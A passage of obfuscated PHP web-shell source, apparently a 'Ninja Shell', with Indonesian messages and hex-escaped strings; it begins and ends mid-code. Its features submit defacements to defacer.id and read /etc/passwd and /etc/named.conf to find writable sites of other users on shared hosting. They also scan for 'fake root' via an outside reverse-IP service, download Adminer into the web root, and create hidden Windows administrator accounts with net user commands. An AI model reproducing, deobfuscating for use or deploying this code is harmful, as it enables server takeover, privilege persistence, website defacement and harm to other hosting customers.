sizeof($data_to_post)); curl_setopt($curl, CURLOPT_USERAGENT, "\115\157\x7a\151\154\154\x61\57\x34\x2e\x30\40\50\x63\157\x6d\x70\x61\x74\151\142\154\145\x3b\40\115\x53\111\105\40\x36\x2e\x30\x3b\x20\x57\x69\156\x64\x6f\167\x73\x20\116\x54\x20\65\x2e\x31\x3b\x20\x53\126\x31\73\x20\56\116\x45\x54\x20\103\x4c\122\x20\x31\x2e\61\56\x34\x33\x32\x32\x3b\x20\56\x4e\x45\x54\40\103\114\x52\x20\x32\x2e\60\56\x35\60\x37\62\67\x29"); curl_setopt($curl, CURLOPT_POSTFIELDS, $data_to_post); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_REFERER, "\150\x74\x74\160\x73\x3a\x2f\x2f\x64\x65\x66\141\x63\x65\x72\56\x69\x64\57\156\x6f\x74\151\146\171\x2e\x68\164\155\154"); $result = curl_exec($curl); echo $result; curl_close($curl); echo "\74\x62\162\76"; } } } elseif (isset($_GET[hex("\152\165\155\160\151\156\x67")])) { echo "\74\x68\162\76\x3c\x62\x72\76\74\143\x65\156\164\x65\x72\x3e\x3c\x68\62\x3e\x4a\165\x6d\x70\151\x6e\147\x20\116\151\156\x6a\141\x20\123\x68\x65\154\154\74\57\150\62\76"; echo "\74\x66\x6f\x72\x6d\40\x6d\145\x74\x68\157\144\40\x3d\40\47\x50\x4f\123\124\x27\x20\x61\143\x74\151\157\x6e\40\x3d\40\47\47\76"; echo "\x3c\151\156\160\x75\x74\40\164\171\x70\x65\x20\x3d\x20\x27\163\x75\142\155\151\x74\47\40\156\141\155\x65\x20\75\40\47\x6a\165\155\x70\x27\40\x63\154\x61\163\163\75\x27\146\x6f\162\x6d\55\143\x6f\156\164\x72\157\x6c\x27\40\163\x74\171\x6c\x65\x3d\x27\167\151\144\164\150\72\x32\65\60\x70\170\73\150\145\x69\x67\150\164\72\64\60\x70\x78\73\x27\40\x76\141\154\x75\x65\x20\75\40\47\x4a\x75\155\160\41\47\76\40"; echo "\x3c\x68\x72\x3e\74\x62\x72\x3e\x3c\x2f\143\145\156\x74\x65\x72\x3e"; if (isset($_POST["\x6a\x75\x6d\160"])) { $i = 0; echo "\x3c\160\x72\x65\x3e\74\x64\x69\166\40\x63\154\141\163\x73\x3d\47\x6d\x61\x72\x67\151\156\72\x20\65\x70\170\40\x61\165\164\x6f\73\x27\x3e"; $etc = fopen("\x2f\145\164\143\x2f\x70\x61\163\x73\x77\x64", "\162") or die("\x3c\x66\157\x6e\164\40\143\x6f\x6c\x6f\162\75\x72\145\144\x3e\x43\141\x6e\47\x74\40\162\x65\141\144\40\57\145\x74\143\57\160\141\163\163\167\144\74\57\x66\157\x6e\164\x3e"); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "\74\x66\x6f\156\164\40\x63\157\154\x6f\162\x3d\x72\145\x64\x3e\103\x61\x6e\47\x74\40\x72\145\x61\144\x20\57\x65\164\143\x2f\160\x61\x73\163\167\144\74\57\146\157\x6e\164\76"; } else { preg_match_all("\57\50\56\52\77\51\x3a\170\72\x2f", $passwd, $user_jumping); foreach ($user_jumping[1] as $user_Exc_jump) { $user_jumping_dir = "\57\x68\x6f\x6d\x65\57{$user_Exc_jump}\x2f\x70\x75\x62\x6c\151\143\137\150\x74\x6d\154"; if (is_readable($user_jumping_dir)) { $i++; $jrw = "\133\74\x66\157\156\164\40\x63\157\x6c\157\162\x3d\154\151\x6d\145\76\122\74\x2f\146\x6f\156\164\76\135\40\x3c\x61\40\150\162\145\146\x3d\x27\77\x64\x69\162\75{$user_jumping_dir}\x27\x3e\74\x66\157\x6e\164\40\143\x6f\154\x6f\x72\75\x67\x6f\x6c\144\76{$user_jumping_dir}\74\57\x66\157\x6e\164\76\74\x2f\141\x3e"; if (is_writable($user_jumping_dir)) { $jrw = "\133\74\x66\157\156\x74\x20\x63\x6f\154\157\x72\75\154\x69\x6d\145\76\x52\x57\x3c\57\x66\157\156\x74\76\x5d\40\x3c\141\40\x68\x72\x65\146\x3d\47\77\144\151\x72\75{$user_jumping_dir}\47\76\x3c\x66\x6f\156\x74\40\143\x6f\x6c\157\x72\75\147\157\154\x64\76{$user_jumping_dir}\x3c\x2f\x66\x6f\156\164\76\74\x2f\141\76"; } echo $jrw; if (function_exists("\160\x6f\163\x69\170\137\x67\145\164\x70\167\x75\x69\144")) { $domain_jump = file_get_contents("\57\145\164\143\57\156\141\x6d\145\x64\x2e\143\157\x6e\146"); if ($domain_jump == '') { echo "\x20\75\x3e\40\x28\x20\74\146\157\156\x74\40\143\x6f\x6c\x6f\x72\x3d\162\145\144\x3e\x67\141\x62\x69\x73\x61\x20\x61\155\x62\x69\154\x20\156\141\x6d\141\40\144\157\x6d\141\x69\156\x20\x6e\171\x61\x3c\57\x66\157\x6e\164\x3e\40\51\74\142\x72\76"; } else { preg_match_all("\x23\57\x76\141\x72\x2f\156\141\x6d\x65\144\x2f\50\x2e\52\77\51\x2e\144\x62\43", $domain_jump, $domains_jump); foreach ($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("\x2f\145\164\x63\57\166\141\x6c\151\141\163\x65\x73\x2f{$dj}")); $user_jumping_url = $user_jumping_url["\156\141\155\145"]; if ($user_jumping_url == $user_Exc_jump) { echo "\40\75\76\x20\x28\40\x3c\x75\x3e{$dj}\x3c\x2f\x75\76\40\51\74\x62\162\76"; break; } } } } else { echo "\74\142\162\x3e"; } } } } } if ($i == 0) { } else { echo "\x3c\x62\x72\76\124\x6f\x74\x61\154\x20\141\x64\x61\x20" . $i . "\40\x4b\x61\x6d\x61\162\x20\x64\x69\x20" . gethostbyname($_SERVER["\110\124\124\120\x5f\x48\x4f\123\x54"]) . ''; } echo "\74\57\x64\x69\x76\x3e\x3c\57\x70\x72\x65\76"; } } elseif (isset($_GET[hex("\146\141\x6b\145\55\x72\157\x6f\164")])) { ob_start(); if (!preg_match("\x23\57\x68\x6f\155\x65\x2f{$user}\57\160\165\x62\154\151\x63\137\150\164\155\x6c\43", $_SERVER["\x44\x4f\103\125\115\105\116\124\137\122\x4f\117\124"])) { die("\111\40\x54\x68\x69\x6e\x6b\x20\164\150\x69\163\x20\x73\x65\162\166\x65\162\x20\x69\x73\40\156\x6f\x74\x20\x75\x73\151\156\147\40\163\150\x61\x72\x65\144\40\150\157\x73\x74\40"); } function reverse($url) { $ch = curl_init("\x68\x74\x74\160\x3a\57\x2f\x64\157\x6d\x61\x69\x6e\163\56\171\157\165\147\x65\164\163\151\147\156\x61\x6c\x2e\143\x6f\155\57\x64\x6f\x6d\141\151\x6e\163\x2e\160\150\x70"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "\162\145\155\x6f\x74\145\101\x64\x64\162\x65\x73\x73\x3d{$url}\x26\x6b\x65\x74\x3d"); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("\133", '', str_replace("\135", '', str_replace("\x22\x22", '', str_replace("\x2c\40\54", "\x2c", str_replace("\x7b", '', str_replace("\173", '', str_replace("\x7d", '', str_replace("\54\40", "\54", str_replace("\x2c\x20", "\x2c", str_replace("\47", '', str_replace("\47", '', str_replace("\72", "\54", str_replace("\42", '', $resp))))))))))))); $array = explode("\54\x2c", $resp); unset($array[0]); foreach ($array as $lnk) { $lnk = "\150\164\x74\160\x3a\x2f\x2f{$lnk}"; $lnk = str_replace("\54", '', $lnk); echo $lnk . "\xa"; ob_flush(); flush(); } curl_close($ch); } function cek($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $resp = curl_exec($ch); return $resp; } $cwd = getcwd(); $ambil_user = explode("\x2f", $cwd); $user = $ambil_user[2]; if ($_POST["\162\x65\x76\x65\x72\x73\145"]) { $site = explode("\15\xa", $_POST["\165\162\x6c"]); $file = $_POST["\x66\151\154\145"]; foreach ($site as $url) { $cek = cek("{$url}\57\x7e{$user}\x2f{$file}"); if (preg_match("\x2f\x68\141\143\153\145\144\57\151", $cek)) { echo "\125\122\114\72\x20\x3c\x61\40\x68\x72\x65\146\x3d\x27{$url}\x2f\176{$user}\57{$file}\47\x20\x74\x61\x72\147\x65\x74\75\x27\137\142\x6c\141\156\153\x27\76{$url}\x2f\x7e{$user}\57{$file}\74\57\x61\76\x20\x2d\x3e\x20\74\x66\157\x6e\x74\40\x63\x6f\154\x6f\x72\75\x6c\151\x6d\x65\76\106\x61\153\x65\x20\122\x6f\157\164\41\x3c\x2f\x66\157\156\164\x3e\74\x62\162\76"; } } } else { echo "\x3c\150\x72\76\74\142\162\76\74\143\x65\156\x74\145\162\x3e\74\150\x32\76\x46\141\x6b\x65\40\x52\x6f\157\x74\40\x4e\x69\156\x6a\x61\40\x53\x68\x65\154\x6c\x3c\x2f\x68\62\x3e\x3c\x66\157\x72\155\40\155\145\x74\150\157\144\x3d\47\160\157\x73\x74\x27\76\12\11\11\106\151\x6c\x65\x6e\141\155\145\72\x20\x3c\142\x72\x3e\x3c\151\156\160\165\x74\40\143\154\141\163\163\x3d\x27\146\157\162\155\x2d\x63\157\x6e\164\162\x6f\154\47\x20\x74\171\x70\x65\75\47\164\145\170\x74\47\x20\156\141\155\145\75\47\146\151\154\145\x27\x20\166\141\x6c\x75\145\75\x27\x64\x65\146\141\143\145\x2e\x68\x74\155\154\47\40\163\164\171\154\145\75\x27\x77\151\x64\x74\150\72\63\x30\x30\160\x78\x3b\150\x65\x69\147\x68\164\x3a\x34\60\160\x78\73\47\76\74\x62\x72\x3e\xa\x9\11\x55\x73\x65\162\72\x20\74\142\x72\x3e\x3c\151\x6e\160\x75\x74\40\143\x6c\141\x73\163\75\x27\x66\x6f\162\155\x2d\143\157\x6e\164\162\x6f\154\x27\x20\164\171\x70\x65\x3d\x27\x74\145\x78\x74\47\40\166\141\x6c\165\x65\75\47{$user}\47\40\163\151\x7a\145\x3d\47\65\x30\47\x20\x68\145\x69\147\150\164\x3d\x27\61\x30\x27\x20\x72\x65\141\144\157\156\x6c\x79\x20\163\x74\x79\154\x65\x3d\x27\167\x69\144\x74\x68\x3a\x33\60\60\x70\170\73\x68\x65\151\147\150\164\72\x34\x30\x70\170\73\47\x3e\74\x62\162\76\12\11\x9\x44\x6f\x6d\141\151\156\72\40\74\142\x72\76\xa\11\11\x3c\164\145\x78\x74\141\162\145\141\x20\x63\x6c\141\163\x73\x3d\x27\146\157\162\x6d\55\x63\157\156\x74\162\157\154\x27\x20\x73\164\171\154\x65\x3d\x27\x77\x69\x64\x74\150\72\x20\64\x35\x30\160\x78\73\x20\150\x65\151\x67\x68\x74\x3a\x20\x32\x35\60\160\x78\x3b\x27\x20\x6e\x61\155\x65\x3d\x27\x75\162\154\x27\76"; reverse($_SERVER["\110\124\124\x50\x5f\x48\x4f\123\124"]); echo "\74\57\x74\x65\x78\164\x61\x72\x65\141\x3e\74\x62\x72\76\xa\x9\x9\x3c\x69\156\x70\x75\x74\x20\143\154\x61\x73\x73\75\47\x66\157\162\x6d\x2d\143\157\156\164\162\x6f\154\47\40\x74\x79\x70\x65\75\x27\x73\165\142\x6d\x69\x74\x27\40\156\141\x6d\145\75\x27\x72\145\166\x65\x72\x73\145\x27\40\166\x61\x6c\x75\x65\x3d\x27\123\143\x61\x6e\40\106\x61\153\145\x20\x52\x6f\x6f\x74\41\47\40\163\164\x79\154\145\75\x27\167\151\x64\x74\150\72\x20\x34\65\60\160\x78\73\47\76\12\x9\x9\74\57\146\x6f\x72\155\76\74\x62\x72\76\xa\x9\11\116\x42\x3a\40\123\145\x62\x65\154\165\155\x20\x67\165\156\141\x69\156\x20\x54\x6f\x6f\154\163\40\x69\x6e\x69\x20\54\x20\x75\x70\x6c\157\141\x64\40\x64\165\x6c\165\40\x66\151\x6c\145\40\x64\145\146\141\143\145\40\153\141\154\x69\141\x6e\40\x64\x69\40\x64\x69\162\x20\x2f\150\x6f\155\145\57\x75\x73\145\x72\x2f\x20\144\141\x6e\40\x2f\150\x6f\x6d\x65\57\165\163\145\162\x2f\160\165\142\154\151\x63\137\x68\164\x6d\x6c\x2e\74\x2f\x63\x65\156\164\145\x72\76\74\x68\162\x3e\x3c\142\162\x3e"; } } elseif (isset($_GET[hex("\141\x64\155\151\156\145\162")])) { echo "\x3c\x68\162\x3e\x3c\x62\x72\76"; echo "\x3c\143\145\156\x74\145\162\76\74\x68\x32\76\x41\x64\155\151\156\x65\x72\40\116\151\156\x6a\141\40\x53\x68\145\154\x6c\74\x2f\150\x32\x3e"; echo "\x3c\151\x6e\x70\x75\x74\40\x74\x79\160\x65\x3d\47\x73\x75\142\x6d\x69\164\x27\x20\x63\154\x61\163\163\x3d\x27\x66\157\162\155\x2d\x63\157\x6e\x74\162\x6f\x6c\47\40\x76\141\x6c\165\x65\x3d\47\123\160\x61\167\x6e\40\101\144\x6d\151\156\145\162\x27\40\x73\164\171\x6c\x65\75\x27\167\151\x64\x74\x68\72\x32\x35\x30\x70\x78\x3b\x68\145\x69\147\150\x74\72\x34\x30\160\170\x3b\x27\x20\156\x61\x6d\145\x3d\x27\144\x6f\x5f\141\x64\155\151\x6e\x65\162\x27\x3e\x3c\57\x63\x65\x6e\164\x65\162\x3e"; echo "\x3c\150\x72\x3e\74\142\162\76"; if (isset($_POST["\x64\x6f\x5f\141\144\x6d\x69\x6e\x65\x72"])) { $full = str_replace($_SERVER["\104\x4f\x43\125\115\x45\116\x54\137\x52\x4f\x4f\124"], '', $dir); function adminer($url, $isi) { $fp = fopen($isi, "\x77"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists("\x61\144\155\151\156\x65\162\56\x70\x68\160")) { echo "\x3c\x63\x65\156\x74\145\x72\x3e\74\x66\157\x6e\x74\x20\143\157\154\157\162\75\x6c\x69\x6d\145\x3e\x3c\141\40\x68\x72\145\x66\75\47{$full}\57\x61\x64\155\151\x6e\145\x72\x2e\x70\150\160\47\40\164\141\x72\x67\145\164\75\47\137\142\x6c\141\x6e\x6b\x27\x3e\x2d\x3e\40\141\x64\155\151\x6e\145\x72\x20\154\x6f\147\x69\156\x20\x3c\55\x3c\57\x61\x3e\74\x2f\146\x6f\x6e\x74\x3e\x3c\x2f\x63\145\156\x74\x65\x72\x3e"; } else { if (adminer("\x68\164\x74\x70\163\72\57\57\x77\167\x77\x2e\x61\x64\155\151\156\x65\x72\56\x6f\162\147\x2f\163\164\x61\164\x69\x63\57\x64\x6f\x77\x6e\154\x6f\x61\x64\x2f\64\56\x32\56\64\57\x61\144\x6d\151\156\145\162\55\x34\56\x32\x2e\x34\x2e\160\150\x70", "\x61\144\155\151\x6e\x65\x72\x2e\x70\x68\x70")) { echo "\74\143\x65\156\164\145\162\76\74\x66\157\156\164\x20\x63\x6f\154\x6f\162\x3d\x6c\151\x6d\x65\76\74\x61\x20\x68\162\145\x66\75\x27{$full}\57\x61\144\155\151\x6e\x65\x72\56\x70\150\x70\47\40\164\x61\162\147\x65\164\75\47\137\142\154\x61\x6e\x6b\47\x3e\x2d\x3e\x20\x61\144\x6d\151\x6e\145\162\40\x6c\x6f\x67\151\x6e\40\x3c\x2d\74\x2f\141\x3e\74\57\146\x6f\156\164\x3e\74\57\143\x65\x6e\x74\145\162\76"; } else { echo "\74\143\145\156\x74\145\x72\76\74\x66\x6f\156\x74\x20\143\157\154\x6f\x72\75\x72\x65\144\76\x67\x61\x67\141\154\x20\142\165\141\x74\x20\x66\151\154\x65\x20\x61\x64\155\151\x6e\145\162\x3c\x2f\x66\157\x6e\x74\76\74\57\x63\145\x6e\164\145\162\x3e"; } } } } elseif (isset($_GET[hex("\162\144\x70")])) { if (strtolower(substr(PHP_OS, 0, 3)) === "\x77\151\x6e") { if ($_POST["\143\162\x65\141\164\x65"]) { $user = htmlspecialchars($_POST["\165\x73\x65\162"]); $pass = htmlspecialchars($_POST["\x70\x61\x73\163"]); if (preg_match("\57{$user}\57", exe("\156\x65\164\x20\165\163\145\162"))) { echo "\133\x49\x4e\106\x4f\135\x20\55\76\x20\x3c\x66\x6f\x6e\x74\x20\x63\x6f\154\157\162\75\x72\x65\144\76\x75\163\x65\x72\40\74\146\157\x6e\x74\x20\x63\x6f\x6c\157\162\75\154\x69\155\145\76{$user}\x3c\x2f\x66\157\x6e\x74\x3e\x20\x73\165\x64\x61\x68\x20\141\x64\x61\74\57\x66\x6f\156\x74\x3e"; } else { $add_user = exe("\156\145\164\40\x75\x73\145\x72\x20{$user}\40{$pass}\40\57\141\144\x64"); $add_groups1 = exe("\x6e\x65\x74\40\x6c\x6f\x63\x61\154\x67\162\x6f\165\160\40\101\144\155\x69\156\x69\163\164\162\141\164\x6f\162\163\x20{$user}\40\57\141\x64\144"); $add_groups2 = exe("\x6e\145\x74\40\x6c\157\143\x61\x6c\147\162\x6f\x75\x70\40\101\144\x6d\x69\156\151\x73\x74\x72\x61\x74\157\162\40{$user}\40\57\x61\144\144"); $add_groups3 = exe("\x6e\145\x74\40\x6c\x6f\143\x61\x6c\x67\162\157\x75\160\40\x41\144\155\151\156\151\163\164\x72\x61\164\145\x75\x72\40{$user}\40\57\x61\x64\144"); echo "\x5b\40\x52\104\x50\x20\101\103\103\x4f\x55\x4e\x54\x20\111\116\x46\x4f\40\135\74\142\162\x3e\12\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\40\x20\40\40\55\55\55\55\55\55\x2d\x2d\x2d\x2d\55\x2d\55\55\55\x2d\55\55\x2d\55\x2d\x2d\55\55\x2d\55\x2d\55\55\55\74\x62\x72\x3e\12\40\40\40\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\x20\40\x49\x50\72\x20\74\x66\157\156\164\40\143\157\154\157\x72\75\154\151\x6d\145\x3e" . gethostbyname($_SERVER["\110\124\x54\120\x5f\110\x4f\123\124"]) . "\x3c\57\x66\157\x6e\164\x3e\x3c\x62\162\76\xa\x20\40\x20\40\40\x20\40\x20\40\x20\x20\x20\40\40\x20\40\x55\163\145\x72\156\x61\x6d\145\72\x20\74\146\x6f\156\x74\x20\x63\x6f\x6c\157\162\75\x6c\151\x6d\x65\76{$user}\74\x2f\146\157\x6e\164\x3e\x3c\x62\x72\x3e\xa\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\120\x61\x73\163\x77\x6f\x72\144\x3a\x20\74\146\157\156\x74\x20\x63\157\154\x6f\x72\75\x6c\x69\x6d\x65\x3e{$pass}\74\57\x66\157\156\164\76\74\x62\162\x3e\12\40\x20\40\40\40\40\x20\40\40\x20\40\40\40\40\x20\40\55\55\55\55\x2d\x2d\55\55\55\55\55\55\x2d\55\x2d\x2d\x2d\x2d\55\x2d\55\55\55\55\x2d\55\x2d\x2d\x2d\x2d\x3c\142\162\76\x3c\142\x72\x3e\xa\x20\40\40\40\x20\40\40\40\40\x20\40\x20\x20\40\x20\40\x5b\x20\x53\x54\x41\124\125\x53\40\x5d\74\x62\x72\x3e\xa\x20\40\x20\x20\40\40\x20\40\40\40\x20\x20\40\x20\x20\40\55\x2d\55\x2d\55\x2d\55\55\55\55\x2d\55\x2d\x2d\55\55\x2d\x2d\55\55\55\55\55\x2d\x2d\x2d\55\x2d\55\55\x3c\142\162\x3e\xa\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\40\x20\40"; if ($add_user) { echo "\133\141\x64\x64\x20\165\163\x65\x72\x5d\40\55\76\40\74\x66\x6f\x6e\x74\40\x63\157\x6c\x6f\x72\75\x27\154\x69\x6d\145\47\x3e\x42\145\162\x68\141\x73\151\154\74\x2f\146\157\156\x74\x3e\74\x62\x72\x3e"; } else { echo "\133\x61\x64\144\x20\165\x73\x65\162\x5d\x20\55\76\x20\x3c\146\x6f\x6e\x74\x20\143\157\x6c\x6f\162\x3d\x27\162\145\144\47\76\x47\x61\x67\x61\154\74\57\x66\x6f\156\164\x3e\x3c\142\162\76"; } if ($add_groups1) { echo "\x5b\141\144\x64\40\154\x6f\x63\x61\154\x67\x72\157\165\x70\x20\x41\x64\x6d\x69\x6e\x69\163\164\x72\x61\x74\x6f\162\x73\x5d\40\x2d\76\x20\x3c\x66\x6f\156\x74\x20\143\157\154\157\x72\x3d\x27\x6c\x69\155\145\x27\x3e\102\x65\x72\150\x61\x73\151\x6c\74\57\x66\157\156\x74\x3e\74\x62\162\x3e"; } elseif ($add_groups2) { echo "\133\x61\x64\144\x20\154\x6f\x63\x61\x6c\x67\162\x6f\x75\x70\x20\101\x64\155\x69\x6e\x69\x73\x74\162\141\164\x6f\162\x5d\40\x2d\x3e\40\74\146\157\156\164\40\x63\x6f\154\157\x72\x3d\47\x6c\151\x6d\x65\x27\76\x42\145\x72\x68\x61\x73\x69\x6c\x3c\57\146\157\156\x74\x3e\74\x62\x72\76"; } elseif ($add_groups3) { echo "\x5b\x61\x64\x64\40\154\x6f\x63\x61\x6c\147\x72\157\165\160\40\101\144\x6d\151\x6e\x69\x73\x74\x72\141\164\x65\x75\162\x5d\x20\55\x3e\x20\x3c\x66\157\156\x74\40\143\x6f\x6c\157\x72\75\47\154\151\x6d\145\x27\76\102\145\x72\x68\x61\163\151\x6c\x3c\x2f\x66\x6f\x6e\164\76\74\x62\162\x3e"; } else { echo "\133\141\144\x64\x20\x6c\157\143\141\x6c\147\x72\157\165\160\135\40\55\76\40\74\x66\x6f\x6e\164\x20\143\x6f\x6c\x6f\162\75\x27\x72\x65\144\x27\76\107\141\147\x61\x6c\x3c\57\146\157\x6e\164\x3e\74\142\x72\76"; } echo "\55\55\55\55\x2d\x2d\55\x2d\55\55\55\x2d\x2d\55\55\55\x2d\x2d\55\55\55\x2d\55\x2d\x2d\55\55\55\x2d\x2d\74\142\162\76"; } } elseif ($_POST["\x73\137\x6f\x70\x73\151"]) { $user = htmlspecialchars($_POST["\162\137\165\x73\x65\x72"]); if ($_POST["\157\160\163\151"] == "\61") { $cek = exe("\x6e\x65\164\40\x75\x73\x65\x72\40{$user}"); echo "\x43\150\145\143\153\151\x6e\147\40\165\x73\x65\162\x6e\x61\155\x65\x20\x3c\146\157\156\164\x20\x63\157\154\x6f\x72\75\154\x69\x6d\145\76{$user}\x3c\x2f\x66\x6f\x6e\164\76\x20\x2e\56\x2e\56\x2e\x2e\56\x20"; if (preg_match("\x2f{$user}\57", $cek)) { echo "\x5b\x20\74\146\157\156\x74\x20\x63\x6f\x6c\157\x72\x3d\x6c\151\155\145\76\123\x75\144\141\x68\x20\141\144\x61\74\x2f\146\x6f\x6e\164\76\x20\135\74\x62\162\x3e\12\x20\40\40\x20\40\40\x20\x20\40\40\40\40\x20\x20\x20\40\40\40\40\x20\55\55\x2d\55\x2d\55\55\x2d\x2d\x2d\55\55\x2d\x2d\55\55\x2d\x2d\55\55\55\x2d\55\x2d\x2d\x2d\x2d\55\55\x2d\x3c\x62\x72\x3e\74\x62\x72\76\xa\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\40\40\x20\40\x20\x20\x20\x3c\x70\x72\145\76{$cek}\x3c\57\x70\x72\x65\76"; } else { echo "\133\40\74\146\x6f\156\x74\40\x63\157\154\x6f\x72\x3d\x72\x65\x64\x3e\142\145\x6c\x75\155\x20\x61\144\141\x3c\57\x66\157\156\x74\x3e\40\135"; } } elseif ($_POST["\157\160\x73\x69"] == "\x32") { $cek = exe("\156\145\x74\x20\x75\x73\x65\162\40{$user}\x20\x45\x78\x6f\x72\x63\x69\163\155\x31\63\x33\67"); if (preg_match("\57{$user}\x2f", exe("\x6e\x65\164\40\x75\x73\x65\162"))) { echo "\x5b\x63\150\141\x6e\147\145\40\x70\x61\163\x73\167\157\x72\144\72\40\74\146\x6f\156\164\40\143\157\154\157\x72\x3d\x6c\x69\155\145\76\105\x78\x6f\162\143\151\163\155\61\x33\63\67\74\57\146\x6f\x6e\x74\x3e\135\40\x2d\x3e\x20"; if ($cek) { echo "\74\146\157\x6e\x74\x20\x63\x6f\154\157\162\x3d\154\x69\x6d\x65\x3e\x42\x65\x72\x68\x61\x73\151\154\x3c\x2f\146\157\156\164\x3e"; } else { echo "\x3c\x66\x6f\x6e\x74\x20\143\x6f\x6c\x6f\x72\75\162\x65\x64\76\x47\x61\147\x61\x6c\x3c\x2f\x66\157\156\x74\x3e"; } } else { echo "\133\111\116\106\117\x5d\40\55\76\x20\x3c\146\x6f\x6e\x74\40\143\157\154\x6f\162\x3d\x72\145\144\76\165\163\145\162\40\x3c\146\157\156\164\x20\x63\157\x6c\157\x72\x3d\x6c\x69\x6d\145\76{$user}\x3c\x2f\x66\157\x6e\164\76\40\142\145\154\165\155\40\x61\x64\x61\74\x2f\146\x6f\156\164\x3e"; } } elseif ($_POST["\x6f\x70\163\x69"] == "\x33") { $cek = exe("\x6e\145\x74\x20\165\163\145\162\40{$user}\40\57\104\x45\x4c\x45\124\105"); if (preg_match("\57{$user}\x2f", exe("\156\145\x74\x20\x75\x73\x65\162"))) { echo "\133\x72\145\155\x6f\x76\145\40\x75\163\145\162\x3a\x20\74\x66\x6f\156\164\40\x63\x6f\x6c\x6f\x72\x3d\154\x69\155\145\x3e{$user}\x3c\57\x66\x6f\x6e\164\76\x5d\40\55\76\x20"; if ($cek) { echo "\74\x66\157\156\x74\40\x63\157\x6c\157\162\x3d\x6c\x69\x6d\145\76\102\145\162\x68\x61\x73\151\x6c\74\x2f\146\157\x6e\164\76"; } else { echo "\74\146\x6f\156\x74\40\x63\x6f\154\157\162\x3d\162\x65\144\76\x47\x61\147\x61\x6c\74\57\x66\x6f\x6e\x74\76"; } } else { echo "\133\111\116\106\117\x5d\40\x2d\x3e\x20\x3c\x66\x6f\156\164\40\143\x6f\x6c\x6f\162\75\x72\x65\x64\x3e\165\163\145\x72\40\x3c\x66\157\x6e\x74\40\x63\x6f\154\x6f\x72\x3d\154\x69\155\x65\76{$user}\x3c\x2f\x66\x6f\156\164\76\x20\x62\x65\x6c\165\155\x20\x61\144\141\74\57\146\x6f\x6e\164\x3e"; } } else { } } else { echo "\x3c\x68\162\x3e\74\x62\162\x3e\74\x63\145\x6e\x74\x65\x72\x3e"; echo "\74\150\x32\x3e\122\104\x50\40\116\x69\x6e\x6a\141\x20\x53\x68\x65\154\x6c\74\x2f\x68\x32\76"; echo "\x2d\55\40\x43\162\145\x61\164\x65\40\x52\104\x50\x20\x2d\55\x3c\142\x72\76\xa\x20\x20\40\x20\40\x20\40\x20\40\40\40\40\x3c\x66\157\x72\x6d\x20\155\x65\x74\150\x6f\144\x3d\47\160\157\x73\x74\x27\76\12\x20\40\x20\40\40\40\40\x20\x20\40\40\40\74\x64\x69\x76\x20\143\x6c\141\x73\x73\x20\x3d\x20\x27\162\157\167\x20\x63\154\145\x61\x72\x66\151\x78\x27\x3e\12\x20\x20\x20\40\x20\40\x20\40\x20\40\40\40\74\144\x69\x76\x20\143\154\x61\x73\x73\x20\x3d\x20\x27\x63\157\x6c\x2d\155\x64\55\x34\47\x3e\xa\40\40\x20\x20\x20\x20\x20\40\x20\x20\40\40\x3c\x75\x3e\x55\163\x65\x72\x6e\141\155\145\72\x3c\57\x75\x3e\xa\40\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\x3c\x69\x6e\x70\x75\x74\x20\x63\x6c\141\163\x73\x20\x3d\47\x66\x6f\162\155\55\143\x6f\x6e\164\162\x6f\x6c\x27\40\163\x74\171\154\145\40\75\40\x27\x77\x69\144\x74\150\x3a\x32\x35\60\x70\x78\x3b\x68\x65\x69\x67\x68\x74\72\64\60\x70\170\73\x27\x20\164\x79\x70\145\x3d\x27\164\145\x78\164\x27\40\156\141\x6d\x65\x3d\x27\165\163\145\162\47\40\x70\x6c\x61\x63\145\150\157\154\x64\145\162\75\x27\165\x73\145\162\156\141\155\145\47\40\x76\x61\154\x75\145\x3d\x27\x45\x78\x6f\162\143\151\x73\x6d\61\63\63\67\x27\x20\162\x65\x71\165\151\162\x65\144\x3e\12\40\40\40\40\x20\40\x20\40\x20\40\40\40\x3c\57\144\151\x76\x3e\12\40\x20\40\x20\40\40\40\40\x20\x20\x20\40\x3c\x64\151\x76\40\143\154\141\163\163\x20\75\x20\x27\143\x6f\154\55\x6d\x64\x2d\x34\x27\x3e\xa\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\74\165\76\x50\x61\163\x73\x77\x6f\162\x64\x3a\x3c\x2f\165\76\xa\40\40\40\x20\x20\40\40\40\x20\x20\40\40\74\x69\156\x70\x75\164\40\143\x6c\141\163\x73\40\x3d\x27\x66\157\162\x6d\55\143\157\x6e\x74\x72\x6f\x6c\x27\x20\x73\x74\x79\154\x65\40\x3d\x20\47\167\151\x64\x74\150\x3a\x32\x35\60\x70\x78\x3b\x68\x65\151\x67\x68\164\72\64\x30\160\170\x3b\x27\x20\164\171\x70\x65\x3d\x27\x74\145\x78\x74\x27\x20\x6e\x61\x6d\x65\75\x27\160\x61\x73\163\47\40\x70\x6c\x61\143\x65\x68\157\154\x64\145\x72\75\x27\160\x61\163\x73\x77\x6f\x72\144\47\40\x76\x61\x6c\165\145\x3d\x27\x45\170\x6f\162\x63\151\163\155\61\63\x33\67\x27\40\x72\x65\161\165\151\162\x65\144\x3e\xa\40\x20\40\40\40\40\x20\40\x20\40\40\x20\74\57\144\x69\166\x3e\xa\40\x20\40\x20\40\x20\40\x20\4